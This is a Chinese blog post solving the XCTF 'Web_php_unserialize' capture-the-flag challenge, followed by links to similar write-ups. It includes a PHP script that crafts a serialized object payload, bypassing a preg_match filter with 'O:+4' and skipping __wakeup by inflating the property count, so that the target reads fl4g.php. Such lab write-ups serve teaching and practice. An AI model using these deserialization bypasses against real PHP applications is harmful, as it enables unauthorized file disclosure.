XCTF-WEB进阶区Web_php_unserialize

最新推荐文章于 2024-08-15 10:57:13 发布
最新推荐文章于 2024-08-15 10:57:13 发布
阅读量567 收藏 2
点赞数
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lorezon/article/details/104855664
版权

打开题目是一堆源码:
在这里插入图片描述主要看preg_match('/[oc]:\d+:/i', $var)'unserialize($var)这两处,给上一个大佬的脚本:

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
    $A = new Demo('fl4g.php');
    $C = serialize($A);
    //string(49) "O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}"
    $C = str_replace('O:4', 'O:+4',$C);//绕过preg_match
    $C = str_replace(':1:', ':2:',$C);//绕过wakeup
    var_dump($C);
    var_dump(base64_encode($C));
    
?>

结果如下:
在这里插入图片描述之后将string(68)的结果传参:
在这里插入图片描述

Sure_lis
关注
专栏目录
2020.3.31xctf(Web_php_unserialize)③
DSR446的博客
03-31 336
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($th...
XCTF-Web_php_unserialize
weixin_45613760的博客
08-14 438
题目 题目如下 可以看出来这是一道关于反序列化的题目 分析题目 看一下题目的代码 首先判断GET参数 “var” 是否存在,然后通过base64解码传入变量var,如果不存在就输出网页源码 对var进行一个正则过滤,如果通过正则过滤便会进行反序列化,否则响应信息’stop hacking!’ 题目中出现的魔术方法 题目中存在一个demo类 __contrust() 见名知意,构造方法。具有构造方法的类会在每次创建新对象前调用此方法 ,该方法常用于完成一些初始化工作。 __destruct() 析构方
攻防世界XCTFWeb_php_unserialize
末初的CSDN博客
03-13 1608
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($t...
2024年网络安全最新CTF_WP-攻防世界web题解
最新发布
2401_84215240的博客
08-15 1480
参考:https://www.cnblogs.com/gradyblog/p/16989750.html查看源码提示source.php并且还提到了一个hint.php,查看提示flag在这个里面先看前面的源码source.phprequest接收参数file,判断是否为空、是否是string、checkfile如果满足,则包含file否则打印滑稽所以应该是要把ffffllllaaaagggg文件包含进file,关键就是怎么绕过checkfile。
XCTF 攻防世界】WEB 高手进阶 Web_php_unserialize
weixin_45844670的博客
08-22 413
题目是一段php代码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wake
xctf_web Web_php_unserialize,关于php反序列化的思考
fly夏天的博客
12-13 1646
先来看题目,题目说是php_unserialize可见是php序列化的题目。 打开网页时一段源码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } functi...
XCTF WEB 高手进阶 unserialize3
qq_30076719的博客
11-04 234
看题目名字可以知道,这一题考的是反序列化漏洞,那么要做这一题之前,需要补充一点知识 1、序列化函数:serialize(),简单理解就是把类实例化的代码转换成字符串,可以在url上赋值,会先调用 __sleep()魔术方法 2、反序列化函数:unserialize(),很明显,就是把字符串还原,会先调用__wakeup()魔术方法 3、反序列化漏洞,这个要先理解序列化后的字符串: o:4:“xctf”:1:{s:4:“flag”;s:3:“111”;} o表示对象 a表示数组 s表示字符 i表示数字 其后数
【攻防世界-Web进阶篇-005unserialize3】
gyy990526的博客
03-14 2791
解:打开靶机是一段php代码,最后问你?code=应该等于多少,看见_wakeup()就是典型的反序列化的题。 题目比较简单,只有一个xctf类,首先需要对其实例化,再用serialize进行序列化输出字符串 : <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $xctf=new xc
XCTFWeb进阶部分 WriteUp(一)
野原新之助
10-24 816
文章目录1、unserialize32、Web_php_unserialize3、supersqli(随便注)分析方法一:修改表结构方法二:预处理4、warmup5、web2 终于搭建了自己的网站,已经初具形态,之后大部分博文都会发布在自己的网站上,少量会同步在CSDN,小伙伴们可以去那里看我的一些学习分享呦???? (最近在申请备案,因此网站暂时无法访问……) 传送门:https://www.yyxzz.net 1、unserialize3 题目是一段php代码,是反序列化题目,需要将序列化结果通
攻防世界-web高手进阶
zji
04-25 6583
文章目录攻防世界-web高手进阶一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
攻防世界 web高手进阶 10分题 biscuiti-300
闵行小鱼塘
11-07 1067
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是biscuiti-300的writeup
攻防世界web进阶Web_php_unserialize
qq_45756971的博客
07-30 428
打开题目链接会得到一堆代码 通过 //the secret is in the fl4g.php 这句话我们可以看出来我们所需要的flag在fl4g.php中,我们需要通过反序列化才能得到fl4g.php里边的内容,借鉴下别人的代码通过在线运行工具我们就可以解出所需参数TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== 传参 ?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZml
攻防世界-web-高手进阶-unserialize3
wyj_1216 House
07-10 926
题目 writeup class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } 分析上述代码,发现:_wakeup() 考虑反序列化 <?php class xctf{ public $flag = '111'; public function __wakeup(){ exi...
攻防世界_Web_高手进阶——Web_php_unserialize
Ho1aAs‘s Blog
11-01 246
文章目录解题思路完 解题思路 打开环境,先代码审计 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); }
攻防世界web高手进阶 Web_php_unserialize
weixin_61835841的博客
04-20 946
有错请各位大佬指正 文章目录 工具 分析 操作 工具 1.火狐 2.phpstudy 分析 本题主要考察的知识点: 1.__construct():当对象创建(new)时会自动调用。将传入的 $file 赋值给本地的私有方法 $file 2.unserialize() 时是不会自动调用的。(构造函数) 3.__destruct():当对象被销毁时会自动调用。(析构函数) 4.__wakeup():unserialize() 时.
XCTF攻防世界_Web进阶002
FAFU小宋的博客
10-30 266
XCTF_Web_高手进阶Web_php_include(考察文件包含) Web_php_include(考察文件包含) strstr函数:strstr(字符串,你要搜索的内容,false) #字符串:也就是代码中的$page。例如:在url后面添加 /?page=123456,那么$page的内容就是123456。 #你要搜索的内容:也就是题目中的php://。意思就是该函数会从$page的内容里去寻找php://,而这里是一个while语句,一旦查找到php://,那么就会执行大括号里面的语句。 #f
XCTF web进阶wp(一)
0xdawn的博客
02-28 1023
001 Training-WWW-Robots 查看robots.txt,发现Disallow: /fl0g.php,打开后得到flag。 002 baby_web 初始页面为index.php,bp抓包查看响应就行 003 warmup F12拿到源码链接source.php hint.php:flag not here, and flag in ffffllllaaaagggg &l...
XCTFweb进阶练习题----自我做题思路writeup
qq_43573131的博客
11-26 437
快捷目录: 1.cat 2.2,ics-05(XCTF 4th-CyberEarth) 1.cat 考察知识点: Django框架 cURL漏洞
[wp] 攻防世界 Web_php_unserialize
热门推荐
MercyLin的博客
09-22 3万+
先是一段代码审计: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight...
CTF-WEB入门指南:技能、资源与漏洞解析
"这篇文档是针对想要入门CTF(Capture The Flag)竞赛,特别是Web安全领域的初学者。文档强调了参与CTF的目的,无论是娱乐还是为未来的职业发展做准备,并提醒学习者要有毅力和牺牲休息时间的决心。内容涵盖了需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值